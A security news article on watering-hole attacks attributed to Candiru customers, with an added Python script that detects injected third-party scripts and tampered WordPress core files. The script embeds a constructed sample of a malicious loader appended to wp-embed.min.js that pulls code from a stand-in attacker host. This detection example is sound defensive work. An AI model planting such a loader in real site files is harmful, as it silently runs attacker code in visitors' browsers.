Last Updated on 22/11/2021 by TheDigitalHacker
New evidence suggests that Israeli spyware vendor Candiru, which was recently added to the US government’s economic blacklist, carried out “watering hole” attacks against high-profile targets in the UK and the Middle East.
The strategic web compromises are thought to have happened in two waves, the first beginning in March 2020 and ending in August 2020, and the second beginning in January 2021 and ending in early August 2021, when the malicious scripts were removed from the targeted domains.
Watering hole attacks are a type of highly targeted intrusion in which a specific group of end-users is infected by compromising websites that the group is known to visit, with the aim of gaining access to their computers for further exploitation.
The original attack chains involved injecting JavaScript code, served from a remote attacker-controlled domain, into the compromised websites. The script collected and exfiltrated IP geolocation and system information about the victim machine, but only if the operating system was either Windows or macOS, implying that the campaign was designed to target computers rather than mobile devices. The final stage delivered a likely browser remote code execution exploit, allowing the attackers to take control of the computers.
The second wave, which began in January 2021, was more stealthy: rather than being added directly to the main HTML page, the malicious code was embedded in a genuine WordPress script (“wp-embed.min.js”), which was modified to load a further script from a server under the attacker’s control. Furthermore, the fingerprinting script captured the default language, the list of fonts supported by the browser, the time zone, and the list of browser plugins in addition to system metadata.
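Both injection patterns described above (a script tag pulling code from a domain the site does not own, and a loader spliced into a legitimate core file such as wp-embed.min.js) can be caught by a site owner with a simple integrity check. The following is an added example written for this article, not code from ESET or from the campaign; the page contents, the allowlisted domains and the baseline hash are all constructed here, and in practice the baseline would come from the vendor's release archive.

```python
"""Defender-side check for two watering-hole injection patterns:
(1) a <script src=...> in the page HTML pointing at a host the site does not own, and
(2) a legitimate WordPress core file that has drifted from its baseline hash and now
    references a foreign host.
All sample contents below are constructed for illustration, not captured from a real site."""
import hashlib
import re
from urllib.parse import urlparse

# Assumption: the hosts this site legitimately serves scripts from.
SITE_ALLOWLIST = {"example.org", "www.example.org"}

# Constructed stand-in for the pristine wp-embed.min.js as shipped in the release archive.
CLEAN_WP_EMBED = "!function(e,t){'use strict';var r=!1;/* ...minified core code... */}(window,document);"

# Constructed: the same file with an appended loader fetching a script from an attacker-controlled host.
TAMPERED_WP_EMBED = (
    CLEAN_WP_EMBED
    + ";(function(){var s=document.createElement('script');"
    + "s.src='https://cdn.attacker-example.invalid/f.js';document.head.appendChild(s)})();"
)

# Constructed page HTML: one first-party script and one injected third-party script.
SAMPLE_HTML = (
    "<html><head>"
    "<script src='/wp-includes/js/wp-embed.min.js'></script>"
    "<script type=\"text/javascript\" src=\"https://stats.attacker-example.invalid/t.js\"></script>"
    "</head><body></body></html>"
)

# In a real deployment this map is built from the vendor's release archive;
# here the baseline is derived from the constructed clean file.
BASELINE = {"wp-embed.min.js": hashlib.sha256(CLEAN_WP_EMBED.encode()).hexdigest()}

SCRIPT_SRC_RE = re.compile(r"<script[^>]+src=[\"']([^\"']+)[\"']", re.I)
URL_IN_JS_RE = re.compile(r"https?://[^\s'\"()]+")


def _foreign_host(url, allowlist):
    """Return the host of an absolute URL if it is outside the allowlist, else None."""
    host = urlparse(url).hostname
    if host and host.lower() not in allowlist:
        return host.lower()
    return None


def external_script_sources(html, allowlist=SITE_ALLOWLIST):
    """Return every <script src> URL in the HTML whose host is not allowlisted.
    Relative URLs (same origin) have no host and are not reported."""
    return [src for src in SCRIPT_SRC_RE.findall(html) if _foreign_host(src, allowlist)]


def core_file_findings(name, content, baseline=BASELINE, allowlist=SITE_ALLOWLIST):
    """Report hash drift from the baseline plus any absolute URL to a non-allowlisted host.
    A clean core file yields an empty list."""
    findings = []
    digest = hashlib.sha256(content.encode()).hexdigest()
    if baseline.get(name) != digest:
        findings.append(f"{name}: sha256 differs from baseline")
    for url in URL_IN_JS_RE.findall(content):
        host = _foreign_host(url, allowlist)
        if host:
            findings.append(f"{name}: loads from foreign host {host}")
    return findings


if __name__ == "__main__":
    for src in external_script_sources(SAMPLE_HTML):
        print("page loads third-party script:", src)
    for finding in core_file_findings("wp-embed.min.js", TAMPERED_WP_EMBED):
        print(finding)
```

The hash comparison is what makes the second wave visible: a loader appended to a minified core file is easy to miss by eye, but any byte of drift from the release archive changes the digest. The URL scan is a secondary signal, since a core file normally has no reason to reference an absolute third-party host at all.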
The specific exploit and payload sent have yet to be determined. “This demonstrates that the operators have chosen to focus their operations and do not want to burn their zero-day exploits,” stated ESET malware researcher Matthieu Faou.
The campaign’s links to Candiru stem from the fact that some of the attackers’ command-and-control servers resemble domains previously identified as belonging to the Israeli firm, and from its use of browser-based remote code execution exploits, raising the possibility that “the operators of the watering holes are Candiru customers.”